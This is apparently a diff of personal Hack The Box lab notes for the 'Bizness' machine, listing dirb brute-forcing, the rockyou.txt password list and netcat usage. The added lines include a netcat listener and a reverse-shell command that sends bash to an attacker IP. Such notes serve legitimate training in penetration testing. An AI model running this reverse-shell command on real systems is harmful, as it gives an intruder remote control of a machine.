LorinczMate1990/hackthebox/Mate/Bizness/LMate_logs.md

     * dirb : directory bruteforce
         - dirb http://webpage.com : The webpage to bruteforce
     * rockyou.txt : A large password collection
+    * nc
+        - nc -lp 1337 : Listen to port 1337
+        - nc -c bash 10.10.14.188 1337 : If you can execute this on the attacked machine, you will get a reverse shell.
+(The IP is your machine)